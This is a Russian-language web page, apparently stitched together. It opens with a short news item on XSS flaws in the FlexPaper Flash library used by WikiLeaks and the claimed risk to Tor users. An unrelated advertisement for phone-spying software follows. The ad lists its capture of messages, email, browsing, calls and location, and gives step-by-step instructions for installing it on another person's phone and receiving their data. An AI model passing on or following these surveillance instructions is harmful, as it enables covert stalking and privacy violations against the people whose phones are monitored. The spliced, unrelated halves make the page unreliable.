Специалист WikiLeaks сообщает о новой уязвимости Flash-библиотеки

047Франсиско Алонсо, исследователь и аудитор по безопасности, сообщил о двух серьёзных XSS уязвимостях, которые находятся в ядре открытых Flash-библиотек. На портале WikiLeaks, который славится огромным количеством раскрытых фактов и исследований о деятельности правительства, данная библиотека используется при открытии файлов формата PDF. Об уязвимости Flash было известно и ранее, но новая брешь может использоваться не только в рамках проекта WikiLeaks и внутреннего движка сайта. Этих уязвимостей достаточно для того, чтобы произвести массовую деанонимизацию пользователей Tor.

На данный момент эта сеть считается наиболее надёжной для сокрытия следов своего пребывания в Интернете. Браузер и система прокси-серверов, вкупе с мощным шифрованием, остаётся единственным вариантом для большинства пользователей. Злоумышленники потенциально могут производить перенаправление ссылок с внешнего контента, что поставит под угрозу целостность структуры WikiLeaks, подорвёт доверие со стороны пользователей, а может и вовсе раскроет сайт для массовых атак извне. Попытки деанонимизации Tor предпринимаются регулярно, в том числе и со стороны государственных структур разных стран мира. Особенно из США.

Франсиско Алонсо считает, что WikiLeaks следует давать прямые ссылки на файлы, а не использовать стороннее программное обеспечение, ввиду угрозы для пользователей. Поскольку модули для чтения PDF сейчас встречаются практически на всех сайтах, быть уверенным в безопасности здесь трудно. Порталом WikiLeaks с момент его основания используется библиотека FlexPaper, которая является открытой и свободной для распространения файлов. Однако были обнаружены уязвимости по XSS и наличие вероятности подмены данных сторонним содержимым. Разработчики популярной библиотеки о проблеме прекрасно знают, поэтому обновление безопасности уже было выпущено.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.